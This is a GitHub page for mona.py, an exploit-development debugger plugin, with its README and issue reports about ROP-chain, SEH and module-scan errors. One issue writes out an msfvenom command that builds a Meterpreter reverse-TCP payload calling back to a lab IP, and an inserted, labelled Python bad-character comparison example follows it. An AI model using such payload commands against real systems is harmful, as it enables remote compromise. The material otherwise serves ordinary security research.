mona's Introduction

mona

Corelan Repository for mona.py

What is mona.py?

Mona.py is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes.

For more info on mona.py and how to use it, please consider taking one of Corelan's exploit development classes:

https://www.corelan-training.com

Installation instructions

Immunity Debugger

  1. Drop mona.py into the 'PyCommands' folder (inside the Immunity Debugger application folder).
  2. Install Python 2.7.14 (or a higher 2.7.x version) into c:\python27, overwriting the version that was bundled with Immunity. This is needed to avoid TLS issues when trying to update mona. Make sure you install the 32-bit version of Python.

WinDBG

See https://github.com/corelan/windbglib

Notes

mona.py has been inventoried at Rawsec's CyberSecurity Inventory.

mona's People

Contributors

corelanc0d3r, damif512, dms1lva, idiomaticrefactoring, jmreyes, lincoln-corelan, noraj, onlylonly, phra, reider-roque, saladpanda, theguly, timgates42, uf0o, voidsec

mona's Issues

mona.py hangs at step 1 of 7 during ROP gadget generation; error trying to process kernel32 and kernelbase.dll

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

mona.py hangs at Step 1/7 for finding gadgets for VirtualProtect, outputting the following. (See picture below.)

Steps to reproduce the problem

Open WinDBG x86, attach to an already running x86 program; and run .load pykd.pyd; followed by either !py mona rop or !py mona rop -m kernel32.dll

Other useful information (mona version, debugger & debugger version, OS version, etc)

Latest pykd, (0.3.2.2), Latest mona.py revision (2.0 r599), Windows 10 Pro x64, WinVer 1809, WinDBGx86. I have used this against my target along with !py mona rop -m kernel32.dll (Presumably) both progress to another error (this was after me going to sleep) which I regret not logging, mentioning .symfix. Same results. - Run in a vanilla FLARE_VM, aside from software I am trying to exploit. _NT_SYMBOL_PATH = srv*c:\symbols*http://msdl.microsoft.com/download/symbols

I have had issues with mona/windbglib in the past; reference here.

Edit: Seems to be a symbol problem. Taking a VM snapshot and will experiment. I'm a primary Linux guy, any help is appreciated.
Screen Shot 2019-12-07 at 8 02 00 PM

^ Related error.

tier0.dll is a proprietary, non-standard .dll - could this be why?

pycommands: error importing module (

Expected behavior

Mona should spit back data when launched (!mona) from the Immunity Debugger 1.85

Actual behavior

pycommands: error importing module
....
line 87 in
import urllib ...
Error Image here

Steps to reproduce the problem

installed Immunity Debugger and updated from python 2.7.1 to python 2.7.14
added mona.py to the PyCommands folder
started Immunity Debugger as an admin
use !mona

Other useful information (mona version, debugger & debugger version, OS version, etc)

OS: Windows 7 x64 SP 1
immunity debugger 1.85

error importing module mona at Immunity Debugger

Expected behavior

Possible to use the mona plugin in Immunity Debugger 1.85.

Actual behavior

!mona
PyCommands: error importing module

Steps to reproduce the problem

add mona.py to the PyCommands folder
start Immunity Debugger
use !mona

Other useful information

OS: Windows XP
Immunity Debugger 1.85

Mona failed to produce ropchain, got exception errors regarding IAT

When opening a new issue, please fill out the following sections:

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

Mona throws errors when trying to produce a VirtualProtect ropchain. The issue is the same as the one reported in #44, but I got more errors.

Steps to reproduce the problem

Other useful information (mona version, debugger & debugger version, OS version, etc)

Last logs related to errors

************* Symbol Loading Error Summary **************
Module name            Error
Tee710                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
    thisfuncfullname = thisfunc.getName().lower()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
    syms = thismod.getSymbols()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
    ntHeader = getNtHeaders(self.modbase)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
    return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found

** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
    commands[command].parseProc(opts)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
    findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
    vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
    thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
    allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
    outside = getRangesOutsideModules()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
    populateModuleInfo()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
    thismod = MnModule(key)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
    mzbase    = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

********************************************************************************

Thank you for your help Peter.

In Immunity debugger lower-case disassembly breaks multiple !mona commands

If "Debugging options -> Disasm -> Disassemble in lowercase" is enabled, !mona rop produces invalid results. !mona stackpivot doesn't produce any results.

Suggestions for how to fix this (pick one):

  1. Uppercase the disassembly / lowercase find patterns / do whatever needed to make them match
  2. Make !mona commands whine verbosely if disassembly is in lower-case
  3. For the duration of !mona commands, configure Immunity debugger to produce disassembly in upper-case
  4. Document this somehow =D

findwild command -type switch

Hello Peter,

I happened to dig into the implementation of the findwild command and discovered an undocumented and unimplemented (functionality) -type switch.

If you don't plan to implement this feature then code associated with it can be safely removed (I pinned it in my local repository and can send a pull request if you approve).

On the other hand, if you plan to implement it, how useful will wildcard search be for the bin (opcode sequence) type? Is there a need to search for bytes, for example, like this -- \xFF?\x24*\x1C -- with (?) representing a single byte, and (*) representing any number of bytes? (I really don't know the answer to this question since I'm just getting into exploit development).

'compare' does not search file in workingfolder

Expected behavior

With a custom workingfolder configured, when using !mona compare -a ESP -f bytearray.bin the file bytearray.bin should be found in the workingfolder.

Actual behavior

Unable to find/read file bytearray.bin

Steps to reproduce the problem

!mona config -set workingfolder C:\immdbg\%p
!mona bytearray
!mona compare -a ESP -f bytearray.bin

Invalid opcode when searching for possible gadgets

Checking RM2MP3Converter on Win 7 Ultimate x64, an invalid opcode was returned in rop.txt

Expected behavior

0x100150xx :  # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}

Actual behavior

0x100150xx :  # LEA EDX,ESP # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}

as can be seen, LEA EDX,ESP has been suggested, which is an invalid opcode, AFAIK.

Will ROP support amd64?

It seems the functions for finding ROP gadgets only assume that they are on the x86 architecture. Is support for amd64 in development?

Project documentation

Expected behavior

Typically, a README.md file contains a summary of what the project is/does, and also contains references to further documentation.

Actual behavior

There is no documentation found in this repository.

Steps to reproduce the problem

Check the README.md file for any documentation or references.

Other useful information (mona version, debugger & debugger version, OS version, etc)

N/A

Incorrect last conditional jump into egghunter with checksum verification

Hi,

I tried to use an egghunter with checksum verification generated by mona but it crashed.
Through step by step execution I identified that the last conditional jump was wrong.
You'll find the corresponding mona output attached to this message.
You can easily see what I'm talking about by copying / pasting the egghunter into a debugger.
You'll see that the last conditional jump points to an address between two instructions.
I thought at first that it was a sort of code length optimization but this is not the case.
To fix it I modified the jump to point to the "INC EDX".

egghunter.txt

during create the Rop chains

When I use mona.py to create the ROP chains, it stops
at this position:
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
[+] Attempting to produce rop chain for VirtualProtect
Step 1/7: esi
I have been waiting for many hours, and it is still paused there.

The env:
pykd 0.3
The Os:
windows 8
The python:
python 2.7
The commands:
.load pykd
!py mona
!py mona config -set workingfolder "C:\logs%p"
!py mona rop -m kernel32.dll,ntdll,msvcr120.dll

!mona modules got nothing in Immunity Debugger

I put mona.py into Immunity Debugger's PyCommands folder. When I type "!mona modules" there, I get 0 lines of results. The screenshot is below:


Is that right? I did the test on both Windows 7 and Windows XP and got the same result.

Crash at command "mona rop -m ntdll"

Crash when I run the command: !mona rop -m ntdll

Steps to reproduce the problem

Included exe file and log files:
_rop_progress_for_testing.exe_1792.log
Log.txt
for_testing_exe_.txt
Windows 7 SP1 syswow64 folder: ntdll_dll_.txt

Other useful information

Windows 7 x64 on vmware workstation
4 GB RAM for the VM!
I am running Immunity debugger as administrator
Installed visual studio 2017 c++ redistributable x32
Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:30:55) [MSC v.1500 32 bit (Intel)] on win32
Immunity debugger 1.85
Mona Plugin version : 2.0 r585 (latest update)

Sort output in rop.txt

Hi :)
I think it could be helpful if the output to rop.txt (and possibly other files as well?) would be sorted, by anything. I would use a default sorting by address, but perhaps if there are more sorting ideas it's possible to add a command line flag to change default behavior.
Sounds to me like it's basically casting a set to a list and calling sort at some point in the code, but seeing as it's an 18+ KLOC file, it's hard for me to tell for certain.

AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

Once I execute a command, it gives me this information.
My OS is Windows 7 64-bit.
I installed both 32-bit WinDbg and 64-bit WinDbg.
The 32-bit WinDbg can execute the mona plugin successfully, but the 64-bit WinDbg gives me this information:

0:000> !py mona modules
Hold on...
[+] Command used:
!py mona.py modules

---------- Mona command started on 2016-12-13 01:39:34 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll


Traceback (most recent call last):
  File "mona.py", line 18183, in main
    commands[command].parseProc(opts)
  File "mona.py", line 11240, in procShowMODULES
    modulestosearch = getModulesToQuery(modulecriteria)
  File "mona.py", line 5442, in getModulesToQuery
    populateModuleInfo()
  File "mona.py", line 5557, in populateModuleInfo
    thismod = MnModule(key)
  File "mona.py", line 2538, in __init__
    mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'


and no command can be executed yet

0:000> !py mona rop
Hold on...
[+] Command used:
!py mona.py rop

---------- Mona command started on 2016-12-13 01:45:00 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll


Traceback (most recent call last):
  File "mona.py", line 18183, in main
    commands[command].parseProc(opts)
  File "mona.py", line 11341, in procROP
    findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
  File "mona.py", line 6033, in findROPGADGETS
    modulestosearch = getModulesToQuery(modulecriteria)
  File "mona.py", line 5442, in getModulesToQuery
    populateModuleInfo()
  File "mona.py", line 5557, in populateModuleInfo
    thismod = MnModule(key)
  File "mona.py", line 2538, in __init__
    mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'


Failed to Import Module

Expected behavior

List the modules that don't have any memory checks

Actual behavior


Steps to reproduce the problem

Type !mona modules

Other useful information (mona version, debugger & debugger version, OS version, etc)

mona "current version" as of 10/16/2018, immunity debugger version 1.85, python 2.7.15, windows 10 64 current version

Add Python2.7 shebang

Expected behavior

The script should run without crashing even if a system uses Python3 as default.

Actual behavior

The script crashes when loaded with Python3, the current supported version which is becoming more standard.

Steps to reproduce the problem

python mona.py on a system for which Python3 is default.

I suggest adding the following shebang to mona.py.
#!/usr/bin/env python2.7

As an example, trying to load Mona from Immunity Debugger on a Windows system with Python3 as default will result in an error. By adding that shebang, Mona loads fine if the system also has Python2.7 installed.

Failing to report NO_SEH modules

  1. Narly plugin on windbg:

0:015> !nmod
00030000 0003c000 CRYPTBASE NO_SEH *ASLR *DEP C:\Windows\syswow64\CRYPTBASE.dll
00230000 00239000 netutils /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\netutils.dll
00240000 0024f000 wkscli /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wkscli.dll
00320000 0032d000 wshbth /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wshbth.dll
00330000 0033a000 NO_SEH *ASLR *DEP C:\Program Files (x86)\masked\masked.dll

  2. Mona on windbg:
    0x00330000 | 0x0033a000 | 0x0000a000 | True | True | True | True | False | 2016.0.0.2150 [masked.dll] (C:\Program Files (x86)\masked\masked.dll)
    0x40210000 | 0x40215000 | 0x00005000 | False | True | True | True | True | 6.1.7600.16385 [MSIMG32.dll] (C:\Windows\SysWOW64\MSIMG32.dll)
  3. Mona on Immunity
    Log data, item 5
    Address=0BADF00D
    Message= 0x002b0000 | 0x002ba000 | 0x0000a000 | True | True | True | True | False | 2016.0.0.2150 [masked.dll] (C:\Program Files (x86)\masked\masked.dll)
  4. SafeSEH plugin on Olly
    /SafeSEH Module Scanner, item 5
    SEH mode=No SEH
    Base=0x560000
    Limit=0x56a000
    Module version=2016.0.0.2150
    Module Name=C:\Program Files (x86)\masked\masked.dll

Narly and SafeSEH say my module masked.dll is SafeSEH OFF. But mona on windbg & Immunity doesn't say the same. In fact, I see 4-6 SafeSEH-off modules with other plugins, but mona says all are SEH protected. Probably that's why "!mona seh" results in nothing.

Tested on Windows 7 64-bit with WinDbg:6.12.0002.633 x86 and Immunity v1.85

Error while searching for pointers

The plug-in was installed in accordance with https://github.com/corelan/windbglib.
I tried different versions of this plugin, including the last one.
I assume that this error has been discussed many times, but I have not found a solution to this problem.

0:000> !py mona jmp -r ESP
Hold on...
[+] Command used:
!py mona.py jmp -r ESP
---------- Mona command started on 2017-10-15 04:41:48 (v2.0, rev 570) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules


Traceback (most recent call last):
  File "mona.py", line 18207, in main
    commands[command].parseProc(opts)
  File "mona.py", line 11212, in procFindJMP
    all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
  File "mona.py", line 5846, in findJMP
    modulestosearch = getModulesToQuery(modulecriteria)
  File "mona.py", line 5466, in getModulesToQuery
    populateModuleInfo()
  File "mona.py", line 5577, in populateModuleInfo
    allmodules=dbg.getAllModules()
  File "C:\dbgs\WinDbg\windbglib.py", line 1160, in getAllModules
    getModulesFromPEB()
  File "C:\dbgs\WinDbg\windbglib.py", line 366, in getModulesFromPEB
    moduleLst = pykd.typedVarList(peb.Ldr.deref().InLoadOrderModuleList, "ntdll!_LDR_DATA_TABLE_ENTRY", "InMemoryOrderLinks.Flink")
TypeException: _LDR_DATA_TABLE_ENTRY : symbol name is not found


error importing

Hi there,
I am trying to use the mona.py module with Immunity Debugger v1.85, but I get the error message "pycommands: error importing module."
I already placed the mona.py file inside the pycommands folder.

Regards,

Inventory notification

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#Mona

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this gives visibility to your tool and improves its referencing.

Badges

The badge shows your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges. It looks like the Rawsec's CyberSecurity Inventory badge, but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example: Twitter URL

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

Feature Enhancement(formatted memory comparison) with Working PoC

Summary:
I've been working on a feature to compare a file created by msfvenom/gdb/hex/xxd/hexdump/ollydbg with a copy in memory. It is similar to the command "compare", but instead of reading from a binary file, it reads and parses output from msfvenom, gdb, and a few others.
The idea is to quickly compare the integrity of the injected shellcode.

The feature is ported from expdevBadChars (https://github.com/mgeeky/expdevBadChars), which I find quite useful.

I've written a working alpha build on a forked branch, but the code still needs some touching up before I submit a PR. I am just wondering if you are OK with the added feature and would consider a merge upstream?
https://github.com/onlylonly/mona/tree/advcompare-alpha

Example
Some demonstration & example of the proposed feature


content of file 2a.txt

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.106 LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of py file: 1644 bytes

the mona command
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80
or
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80 -t msfvenom-python

if parameter -t (format type) is supplied, mona will honor the user supplied format, otherwise, mona will attempt to guess the format type based on regular expression.

Looking forward to hearing from you, and thanks for sharing & maintaining mona.py. It's a wonderful tool.
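The parse-then-compare flow the proposed advcompare feature describes, as an added example that is not part of the issue, of the forked branch, or of mona.py itself: it parses msfvenom -f py output or a plain hex dump (guessing the format by regular expression when no -t is given, as the post proposes) and diffs the bytes against a memory snapshot. The sample dump, the snapshot bytes, the format-guessing heuristic and the report layout are all constructed for this example; mona's real compare code and windbglib are not used, and the script is plain Python 3.

```python
import re

# Constructed sample in the shape of msfvenom `-f py` output: a few header lines
# followed by `buf += "\x.."` fragments. The bytes are made-up filler, not a payload.
SAMPLE_MSFVENOM_PY = r'''
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Payload size: 12 bytes
buf =  ""
buf += "\x90\x90\x31\xc0\x50\x68"
buf += "\x0a\x0d\x00\xcc\xc3\xff"
'''

# Constructed plain hex dump of the same 12 bytes (the "hex" input type).
SAMPLE_HEX = "90 90 31 c0 50 68 0a 0d 00 cc c3 ff"

_PY_FRAGMENT_RE = re.compile(r'buf\s*\+?=\s*"((?:\\x[0-9a-fA-F]{2})*)"')
_HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
_PLAIN_HEX_LINE_RE = re.compile(r'^\s*(?:[0-9a-fA-F]{2}\s*)+$')


def guess_format(text):
    """Guess the dump format from its shape (the autodetect the issue proposes; heuristic assumed here)."""
    if _PY_FRAGMENT_RE.search(text):
        return "msfvenom-python"
    lines = text.strip().splitlines()
    if lines and all(_PLAIN_HEX_LINE_RE.match(line) for line in lines):
        return "hex"
    raise ValueError("unrecognised dump format")


def parse_dump(text, fmt=None):
    """Turn a textual dump into bytes. fmt=None plays the role of omitting -t."""
    fmt = fmt or guess_format(text)
    if fmt == "msfvenom-python":
        out = bytearray()
        for fragment in _PY_FRAGMENT_RE.findall(text):
            out.extend(int(h, 16) for h in _HEX_ESCAPE_RE.findall(fragment))
        return bytes(out)
    if fmt == "hex":
        return bytes.fromhex("".join(text.split()))
    raise ValueError("unsupported format: %s" % fmt)


def compare_with_memory(expected, memory):
    """Diff the expected bytes against a snapshot read from the target address.

    The report lists every mismatching offset, how many leading bytes survived,
    and the expected values at the start of each corrupted run plus the byte at
    which a short copy stopped: the usual bad-character suspects."""
    n = min(len(expected), len(memory))
    mismatches = []
    suspects = set()
    for i in range(n):
        if expected[i] != memory[i]:
            mismatches.append((i, expected[i], memory[i]))
            if i == 0 or expected[i - 1] == memory[i - 1]:
                suspects.add(expected[i])
    truncated = len(memory) < len(expected)
    if truncated:
        suspects.add(expected[len(memory)])  # first byte that never made it into memory
    if truncated:
        status = "truncated"
    elif mismatches:
        status = "corrupted"
    else:
        status = "unmodified"
    return {
        "status": status,
        "intact_prefix": mismatches[0][0] if mismatches else n,
        "mismatches": mismatches,
        "suspect_badchars": sorted(suspects),
    }


def demo_report():
    """Constructed scenario: the target turned 0x0a into a space and stopped copying at the 0x00."""
    expected = parse_dump(SAMPLE_MSFVENOM_PY)
    memory_snapshot = bytes([0x90, 0x90, 0x31, 0xc0, 0x50, 0x68, 0x20, 0x0d])
    return compare_with_memory(expected, memory_snapshot)


if __name__ == "__main__":
    report = demo_report()
    print("status=%s intact_prefix=%d" % (report["status"], report["intact_prefix"]))
    for off, exp, got in report["mismatches"]:
        print("  offset %d: expected %02x, found %02x" % (off, exp, got))
    print("suspect bad chars:", " ".join("%02x" % b for b in report["suspect_badchars"]))
```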

seh command outputs duplicate addresses

Setup -- OS: Windows XP SP 3 Eng, program - Easy RM to MP3 Converter (from Exploit Writing Tutorial, part 1 on corelan.be), latest version of mona recently pulled from Github, Immunity Debugger v1.85

Command !mona seh finds duplicate addresses and gives an incorrect instruction for the opcode sequence in one of the found cases:

0x00436213 : jmp dword ptr ss:[esp+1c]| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)

0x00436213 : call dword ptr ss:[esp+1c]| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)

The opcode at the 0x00436213 address is FF54241C which corresponds to call dword [esp+0x1c] instruction.

pycommands: error importing module

Expected behavior

Actual behavior

pycommands: error importing module

Steps to reproduce the problem

Windows 10 Home Native (no VM)
Immunity debugger using command !mona

Other useful information (mona version, debugger & debugger version, OS version, etc)

Python 2.7 32-bit
PATH added
Other commands working like !list or !heap or !mike

I can see when I run any other command a .pyc file is created but that never happens when trying to use mona commands.

I verified the size of mona.py file and privileges. It keeps showing "pycommands: error importing module"
Please help

Error while creating a ROP gadget

Expected behavior

Mona.py should create rop_chains.txt and rop.txt files after running one of the following commands:

!mona rop -m slmfc.dll -n -cpb "\x00\x0a\x0d"
!mona rop -m slmfc.dll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n -cpb "\x00\x0a\x0d"
!mona rop
!mona rop -m slmfc.dll

Actual behavior

Mona throws an _rop_progress_SLmail.exe_1164.log error (see screenshot).

I see a "local variable referenced before assignment" error on a splash screen (could not capture that error though).

Steps to reproduce the problem

  1. Install SLMail 5.5.x on Windows 7 SP1
  2. Make sure that DEP is set to OptOut mode (not sure if that matters)

Other useful information (mona version, debugger & debugger version, OS version, etc)

  1. Mona version: latest version as of today
  2. Python version 2.7.16
  3. Immunity Debugger version 1.85
  4. O.S : Windows 7 SP1


dll load failed 1 is not a valid win32 application

When opening a new issue, please fill out the following sections:

Expected behavior

!mona modules should be running

Actual behavior

Error dll load failed 1 is not a valid win32 application

Steps to reproduce the problem

1. Download mona
2. Copy it to the pycommands folder of ID
3. Run !mona modules
4. Got error: dll load failed 1 is not a valid win32 application

Other useful information (mona version, debugger & debugger version, OS version, etc)

Mona: Newest version
ID: v1.85
OS: Windows 10 (64 bits)

mona rop Error

When opening a new issue, please fill out the following sections:

Expected behavior

get rop chain

Actual behavior

[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll


Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'


Steps to reproduce the problem

2:033> !py mona rop -m mshtml.dll
Hold on...
[+] Command used:
!py mona.py rop -m mshtml.dll

---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Only querying modules mshtml.dll
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_iexplore.exe_2592.log'
- (Re)setting logfile _rop_progress_iexplore.exe_2592.log
[+] Progress will be written to _rop_progress_iexplore.exe_2592.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Going to create rop chains for all relevant/supported techniques:
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll


Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
